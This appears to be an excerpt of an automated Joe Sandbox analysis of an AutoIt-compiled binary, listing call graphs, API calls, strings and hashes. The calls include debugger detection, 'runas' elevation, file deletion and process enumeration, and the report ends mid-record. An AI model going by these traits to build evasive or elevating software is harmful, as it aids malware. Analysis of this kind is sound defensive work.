94904->94907 94906 3a962f 94935 39f669 20 API calls _free 94906->94935 94924 3a54d7 EnterCriticalSection 94907->94924 94908 3a96fb 94940 39f669 20 API calls _free 94908->94940 94912 3a9680 94914 3a96b9 94912->94914 94915 3a96a4 94912->94915 94913 3a9703 94941 3a2b7c 26 API calls __cftof 94913->94941 94925 3a971b 94914->94925 94936 39f669 20 API calls _free 94915->94936 94918 3a9637 __wsopen_s 94918->94893 94920 3a96a9 94937 39f656 20 API calls _free 94920->94937 94921 3a96b4 94938 3a96ee LeaveCriticalSection __wsopen_s 94921->94938 94924->94912 94926 3a5754 __wsopen_s 26 API calls 94925->94926 94927 3a972d 94926->94927 94928 3a9746 SetFilePointerEx 94927->94928 94929 3a9735 94927->94929 94930 3a975e GetLastError 94928->94930 94931 3a973a 94928->94931 94942 39f669 20 API calls _free 94929->94942 94943 39f633 20 API calls 2 library calls 94930->94943 94931->94921 94934->94906 94935->94918 94936->94920 94937->94921 94938->94918 94939->94908 94940->94913 94941->94918 94942->94931 94943->94931 94944 3815af 94945 38e34f 8 API calls 94944->94945 94946 3815c5 94945->94946 94951 38e3b3 94946->94951 94948 3815ef 94963 3e3ef6 81 API calls __wsopen_s 94948->94963 94950 3c61ab 94952 377a14 8 API calls 94951->94952 94953 38e3ea 94952->94953 94954 37b25f 8 API calls 94953->94954 94956 38e41b 94953->94956 94955 3ce4e4 94954->94955 94957 377af4 8 API calls 94955->94957 94956->94948 94958 3ce4ef 94957->94958 94964 38e73b 39 API calls 94958->94964 94960 3ce502 94961 3ce506 94960->94961 94962 37b3fe 8 API calls 94960->94962 94962->94961 94963->94950 94964->94960 94965 3b27a2 94968 372a52 94965->94968 94969 372a91 mciSendStringW 94968->94969 94970 3b39f4 DestroyWindow 94968->94970 94971 372aad 94969->94971 94972 372d08 94969->94972 94981 3b3a00 94970->94981 94973 372abb 94971->94973 94971->94981 94972->94971 94974 372d17 UnregisterHotKey 94972->94974 95000 372e70 94973->95000 94974->94972 94976 3b3a45 94982 3b3a69 94976->94982 94983 3b3a58 FreeLibrary 94976->94983 94977 3b3a1e FindClose 94977->94981 94979 372ad0 94979->94982 94987 372ade 94979->94987 94980 377953 CloseHandle 94980->94981 94981->94976 94981->94977 94981->94980 94984 3b3a7d VirtualFree 94982->94984 94989 372b4b 94982->94989 94983->94976 94984->94982 94985 372b3a CoUninitialize 94985->94989 94986 3b3ac5 94992 3b3ad4 messages 94986->94992 95006 3e3c45 6 API calls messages 94986->95006 94987->94985 94989->94986 94990 372b56 94989->94990 95004 372f86 VirtualFreeEx CloseHandle 94990->95004 94994 3b3b63 94992->94994 95007 3d6d63 8 API calls messages 94992->95007 94995 372b7c 94995->94992 94996 372c61 94995->94996 94996->94994 94997 372caf 94996->94997 94997->94994 95005 372eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 94997->95005 94999 372d03 95001 372e7d 95000->95001 95002 372ac2 95001->95002 95008 3d78b9 8 API calls 95001->95008 95002->94976 95002->94979 95004->94995 95005->94999 95006->94986 95007->94992 95008->95001 95009 37f48c 95012 37ca50 95009->95012 95013 37ca6b 95012->95013 95014 3c14af 95013->95014 95015 3c1461 95013->95015 95038 37ca90 95013->95038 95053 3f61ff 254 API calls 2 library calls 95014->95053 95018 3c146b 95015->95018 95021 3c1478 95015->95021 95015->95038 95051 3f6690 254 API calls 95018->95051 95034 37cd60 95021->95034 95052 3f6b2d 254 API calls 2 library calls 95021->95052 95024 3c1742 95024->95024 95026 38e781 39 API calls 95026->95038 95029 37cd8e 95030 3c168b 95055 3f6569 81 API calls 95030->95055 95033 37bdc1 39 API calls 95033->95038 95034->95029 95056 3e3ef6 81 API calls __wsopen_s 95034->95056 95037 37b3fe 8 API calls 95037->95038 95038->95026 95038->95029 95038->95030 95038->95033 95038->95034 95038->95037 95039 37cf30 39 API calls 95038->95039 95040 3802f0 254 API calls 95038->95040 95041 37be6d 8 API calls 95038->95041 95043 38e73b 39 API calls 95038->95043 95044 38aa19 254 API calls 95038->95044 95045 3905d2 5 API calls __Init_thread_wait 95038->95045 95046 38bbd2 8 API calls 95038->95046 95047 390433 29 API calls __onexit 95038->95047 95048 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95038->95048 95049 38f4ed 81 API calls 95038->95049 95050 38f354 254 API calls 95038->95050 95054 3cff4f 8 API calls 95038->95054 95039->95038 95040->95038 95041->95038 95043->95038 95044->95038 95045->95038 95046->95038 95047->95038 95048->95038 95049->95038 95050->95038 95051->95021 95052->95034 95053->95038 95054->95038 95055->95034 95056->95024

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 278 375d78-375de7 call 37bf07 GetVersionExW call 3784b7 283 3b4f0c-3b4f1f 278->283 284 375ded 278->284 286 3b4f20-3b4f24 283->286 285 375def-375df1 284->285 289 3b4f4b 285->289 290 375df7-375e56 call 3796d9 call 3779ed 285->290 287 3b4f27-3b4f33 286->287 288 3b4f26 286->288 287->286 291 3b4f35-3b4f37 287->291 288->287 294 3b4f52-3b4f5e 289->294 303 3b50ad-3b50b4 290->303 304 375e5c-375e5e 290->304 291->285 293 3b4f3d-3b4f44 291->293 293->283 296 3b4f46 293->296 297 375ecc-375ee6 GetCurrentProcess IsWow64Process 294->297 296->289 299 375f45-375f4b 297->299 300 375ee8 297->300 302 375eee-375efa 299->302 300->302 305 375f00-375f0f LoadLibraryA 302->305 306 3b50f2-3b50f6 GetSystemInfo 302->306 309 3b50b6 303->309 310 3b50d4-3b50d7 303->310 307 375e64-375e67 304->307 308 3b4fae-3b4fc1 304->308 314 375f11-375f1f GetProcAddress 305->314 315 375f4d-375f57 GetSystemInfo 305->315 307->297 316 375e69-375eab 307->316 317 3b4fea-3b4fec 308->317 318 3b4fc3-3b4fcc 308->318 311 3b50bc 309->311 312 3b50d9-3b50e8 310->312 313 3b50c2-3b50ca 310->313 311->313 312->311 324 3b50ea-3b50f0 312->324 313->310 314->315 325 375f21-375f25 GetNativeSystemInfo 314->325 326 375f27-375f29 315->326 316->297 319 375ead-375eb0 316->319 322 3b4fee-3b5003 317->322 323 3b5021-3b5024 317->323 320 3b4fd9-3b4fe5 318->320 321 3b4fce-3b4fd4 318->321 327 375eb6-375ec0 319->327 328 3b4f63-3b4f6d 319->328 320->297 321->297 329 3b5010-3b501c 322->329 330 3b5005-3b500b 322->330 331 3b505f-3b5062 323->331 332 3b5026-3b5041 323->332 324->313 325->326 333 375f32-375f44 326->333 334 375f2b-375f2c FreeLibrary 326->334 327->294 335 375ec6 327->335 338 3b4f6f-3b4f7b 328->338 339 3b4f80-3b4f8a 328->339 329->297 330->297 331->297 340 3b5068-3b508f 331->340 336 3b504e-3b505a 332->336 337 3b5043-3b5049 332->337 334->333 335->297 336->297 337->297 338->297 341 3b4f9d-3b4fa9 339->341 342 3b4f8c-3b4f98 339->342 343 3b509c-3b50a8 340->343 344 3b5091-3b5097 340->344 341->297 342->297 343->297 344->297
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00375DA7
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                • GetCurrentProcess.KERNEL32(?,0040DC2C,00000000,?,?), ref: 00375ED3
                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00375EDA
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00375F05
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00375F17
                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00375F25
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00375F2C
                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00375F51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                • API String ID: 3290436268-3101561225
                                                • Opcode ID: d20af4b4669c3bb5178da307f383c2d3226cc00cead4d32c1b5850ab154ae6b5
                                                • Instruction ID: 8616baec45a7be5ba0cdbd5bc393695074963b37228c463c2e2dbbaf19c4d907
                                                • Opcode Fuzzy Hash: d20af4b4669c3bb5178da307f383c2d3226cc00cead4d32c1b5850ab154ae6b5
                                                • Instruction Fuzzy Hash: 30A1953A8196C0CFC726CF797E401D97FB46B27304B8498B9F94597622C6EC4558CB2D

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003732EF,?), ref: 00373342
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003732EF,?), ref: 00373355
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00442418,00442400,?,?,?,?,?,?,003732EF,?), ref: 003733C1
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                  • Part of subcall function 003741E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003733E9,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00374227
                                                • SetCurrentDirectoryW.KERNELBASE(?,00000001,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00373442
                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 003B3C8A
                                                • SetCurrentDirectoryW.KERNEL32(?,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 003B3CCB
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004331F4,00442418,?,?,?,?,?,?,?,003732EF), ref: 003B3D54
                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 003B3D5B
                                                  • Part of subcall function 0037345A: GetSysColorBrush.USER32(0000000F), ref: 00373465
                                                  • Part of subcall function 0037345A: LoadCursorW.USER32(00000000,00007F00), ref: 00373474
                                                  • Part of subcall function 0037345A: LoadIconW.USER32(00000063), ref: 0037348A
                                                  • Part of subcall function 0037345A: LoadIconW.USER32(000000A4), ref: 0037349C
                                                  • Part of subcall function 0037345A: LoadIconW.USER32(000000A2), ref: 003734AE
                                                  • Part of subcall function 0037345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003734C6
                                                  • Part of subcall function 0037345A: RegisterClassExW.USER32(?), ref: 00373517
                                                  • Part of subcall function 0037353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00373568
                                                  • Part of subcall function 0037353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00373589
                                                  • Part of subcall function 0037353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 0037359D
                                                  • Part of subcall function 0037353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 003735A6
                                                  • Part of subcall function 003738F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003739C3
                                                Strings
                                                • 0$D, xrefs: 0037341C
                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 003B3C84
                                                • runas, xrefs: 003B3D4F
                                                • AutoIt, xrefs: 003B3C7F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                • String ID: 0$D$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                • API String ID: 683915450-319202188
                                                • Opcode ID: cee5de3dd18bc0ec410063b21128163c48ee95d773fcb06601efc498db878d5f
                                                • Instruction ID: 9bb1cac8d8e235840261d6f7a31a92e932e44c590ecd534939df97d0d653a26c
                                                • Opcode Fuzzy Hash: cee5de3dd18bc0ec410063b21128163c48ee95d773fcb06601efc498db878d5f
                                                • Instruction Fuzzy Hash: 76512870108341AAD727EF60DD05ABE7BB8DF85714F80843DF4895A1A2CB7C8A4DD726

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 409 3e9f9f-3e9fc7 FindFirstFileW 410 3ea03a-3ea045 FindClose 409->410 411 3e9fc9-3e9fde call 3955c2 409->411 413 3ea04b-3ea05e FindFirstFileW 410->413 414 3ea0e2 410->414 419 3ea028-3ea038 FindNextFileW 411->419 420 3e9fe0-3e9ff5 call 3955c2 411->420 416 3ea0d9 413->416 417 3ea060-3ea066 413->417 418 3ea0e4-3ea0e8 414->418 421 3ea0db-3ea0dc FindClose 416->421 422 3ea069-3ea070 417->422 419->410 419->411 420->419 429 3e9ff7-3ea020 GetFileAttributesW SetFileAttributesW 420->429 421->414 424 3ea0c7-3ea0d7 FindNextFileW 422->424 425 3ea072-3ea087 call 3955c2 422->425 424->416 424->422 425->424 430 3ea089-3ea09e call 3955c2 425->430 431 3ea0eb-3ea0f4 FindClose 429->431 432 3ea026 429->432 430->424 435 3ea0a0-3ea0be SetCurrentDirectoryW call 3e9f9f 430->435 431->418 432->419 438 3ea0f6-3ea0f8 435->438 439 3ea0c0-3ea0c5 SetCurrentDirectoryW 435->439 438->421 439->424
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,?,74DE8FB0,?,00000000), ref: 003E9FC0
                                                • GetFileAttributesW.KERNELBASE(?), ref: 003E9FFE
                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 003EA018
                                                • FindNextFileW.KERNELBASE(00000000,?), ref: 003EA030
                                                • FindClose.KERNEL32(00000000), ref: 003EA03B
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 003EA057
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003EA0A7
                                                • SetCurrentDirectoryW.KERNEL32(00437B94), ref: 003EA0C5
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003EA0CF
                                                • FindClose.KERNEL32(00000000), ref: 003EA0DC
                                                • FindClose.KERNEL32(00000000), ref: 003EA0EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 9e8c01f44f5be928e42b122b9d37ba1450c56430d798114cc5cdf3204b335098
                                                • Instruction ID: faccdfe356da8ec2813ed41d08231ada5a00ba9f86bdda5c7d8606e0d6e7c711
                                                • Opcode Fuzzy Hash: 9e8c01f44f5be928e42b122b9d37ba1450c56430d798114cc5cdf3204b335098
                                                • Instruction Fuzzy Hash: B9310831A006696BDF129FF5DC49ADE77ACAF05320F1142A6E805E30D1DB34EE88CB15

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2273 3dd836-3dd894 call 37bf07 * 3 call 37557e * 2 call 3de958 call 3de9c5 2288 3dd89f-3dd8a9 call 3de9c5 2273->2288 2289 3dd896-3dd89a call 3765a4 2273->2289 2293 3dd8ab-3dd8af call 3765a4 2288->2293 2294 3dd8b4-3dd8f2 call 37bf07 * 2 call 37694e FindFirstFileW 2288->2294 2289->2288 2293->2294 2302 3dd8f8 2294->2302 2303 3dda23-3dda2a FindClose 2294->2303 2305 3dd8fe-3dd900 2302->2305 2304 3dda2d-3dda5b call 37bd2c * 5 2303->2304 2305->2303 2307 3dd906-3dd90d 2305->2307 2309 3dd9ef-3dda02 FindNextFileW 2307->2309 2310 3dd913-3dd979 call 37b25f call 3ddf85 call 37bd2c call 377af4 call 3765a4 call 3ddc8e 2307->2310 2309->2305 2313 3dda08-3dda0d 2309->2313 2332 3dd99f-3dd9a3 2310->2332 2333 3dd97b-3dd97e 2310->2333 2313->2305 2336 3dd9a5-3dd9a8 2332->2336 2337 3dd9d1-3dd9d7 call 3dda5c 2332->2337 2334 3dd984-3dd99b call 38e2e5 2333->2334 2335 3dda12-3dda21 FindClose call 37bd2c 2333->2335 2347 3dd9ad-3dd9b6 MoveFileW 2334->2347 2350 3dd99d DeleteFileW 2334->2350 2335->2304 2341 3dd9b8-3dd9c8 call 3dda5c 2336->2341 2342 3dd9aa 2336->2342 2344 3dd9dc 2337->2344 2341->2335 2351 3dd9ca-3dd9cf DeleteFileW 2341->2351 2342->2347 2348 3dd9df-3dd9e1 2344->2348 2347->2348 2348->2335 2352 3dd9e3-3dd9eb call 37bd2c 2348->2352 2350->2332 2351->2348 2352->2309
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                  • Part of subcall function 003DE9C5: GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003DD8E2
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003DD99D
                                                • MoveFileW.KERNEL32(?,?), ref: 003DD9B0
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 003DD9CD
                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003DD9F7
                                                  • Part of subcall function 003DDA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,003DD9DC,?,?), ref: 003DDA72
                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 003DDA13
                                                • FindClose.KERNEL32(00000000), ref: 003DDA24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 1946585618-1173974218
                                                • Opcode ID: 4c2769b76b18dfe48e4c58589312d7dd203fa8e755a8e6a5ca9afa2c1031730a
                                                • Instruction ID: 42a0e5c33be1dba7967ba266fc11a6b369e1bc12325009a131da8fa10146b4c5
                                                • Opcode Fuzzy Hash: 4c2769b76b18dfe48e4c58589312d7dd203fa8e755a8e6a5ca9afa2c1031730a
                                                • Instruction Fuzzy Hash: 36614032C0114D9BCF16EFE0DA52AEDBB75AF15300F2480AAE445BB256EB355F09DB50
                                                APIs
                                                  • Part of subcall function 0037557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00375558,?,?,003B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0037559E
                                                  • Part of subcall function 003DE9C5: GetFileAttributesW.KERNELBASE(?,003DD755), ref: 003DE9C6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003DDBE0
                                                • DeleteFileW.KERNELBASE(?,?,?,?), ref: 003DDC30
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003DDC41
                                                • FindClose.KERNEL32(00000000), ref: 003DDC58
                                                • FindClose.KERNEL32(00000000), ref: 003DDC61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: 95b98fb58a74ab62ebc1f8ef6ea1c834f00b88eafc6b27a71178e084d3301d37
                                                • Instruction ID: d3ffec286407d028be59e20e036fb5292f20a165ff22f07b589b378d37fda54f
                                                • Opcode Fuzzy Hash: 95b98fb58a74ab62ebc1f8ef6ea1c834f00b88eafc6b27a71178e084d3301d37
                                                • Instruction Fuzzy Hash: 2031C3320083449BC312EF64D8919AFB7F8BE92304F40895EF4D5972A1DB74DA0DCB56
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 003DDCC1
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 003DDCCF
                                                • Process32NextW.KERNEL32(00000000,?), ref: 003DDCEF
                                                • CloseHandle.KERNELBASE(00000000), ref: 003DDD9C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 5017cbbdc454c035fce27a3a1a383cf10cd096c0be3a865f959ead5c2ad41739
                                                • Instruction ID: af42b25636e957e0cb94644c729b1b535ee2da2fc5e43c3113817ca56ce57815
                                                • Opcode Fuzzy Hash: 5017cbbdc454c035fce27a3a1a383cf10cd096c0be3a865f959ead5c2ad41739
                                                • Instruction Fuzzy Hash: 8031A4725083009FD712EF64DC85BAFBBF8AF99350F04482DF5858B2A1DB719949CB92
                                                APIs
                                                • lstrlenW.KERNEL32(?,003B4686), ref: 003DE397
                                                • GetFileAttributesW.KERNELBASE(?), ref: 003DE3A6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003DE3B7
                                                • FindClose.KERNELBASE(00000000), ref: 003DE3C3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                • String ID:
                                                • API String ID: 2695905019-0
                                                • Opcode ID: 52ce6813526158d7145413ce1c5dd369db00ec7747660bc05eee0531d0215efa
                                                • Instruction ID: bb5278af4a3af4f18db0ab75c989e0e2e006718dcc858c143c5abe2637288820
                                                • Opcode Fuzzy Hash: 52ce6813526158d7145413ce1c5dd369db00ec7747660bc05eee0531d0215efa
                                                • Instruction Fuzzy Hash: 1BF0A03281192057C31277B8AD0D8BA7FAC9E41335B104766F835D22F0DBB099994699
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,0039504E,?,004398D8,0000000C,003951A5,?,00000002,00000000), ref: 00395099
                                                • TerminateProcess.KERNEL32(00000000,?,0039504E,?,004398D8,0000000C,003951A5,?,00000002,00000000), ref: 003950A0
                                                • ExitProcess.KERNEL32 ref: 003950B2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 2eaf1af1fb9d29903b6f34ab7f19d45d88bc05ee923532eb18e8172bfa0c3ebb
                                                • Instruction ID: b182786c61c898425c3a424096d52f85866aafd5e6ddd8b8f7336962a204447b
                                                • Opcode Fuzzy Hash: 2eaf1af1fb9d29903b6f34ab7f19d45d88bc05ee923532eb18e8172bfa0c3ebb
                                                • Instruction Fuzzy Hash: 37E0B631800548AFDF236FA4DE0DE593B69EB41381F014028FC459A232DF35DD86CB94
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 003CE60A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID: X64
                                                • API String ID: 2645101109-893830106
                                                • Opcode ID: 7b7d8f9d5f658d3e74c70d13057465e5706560f1aeae46c601377e9269cd3dee
                                                • Instruction ID: f786413c966820c677d21cebd04a8e40617b8098ed5c6d564473258ffee91e16
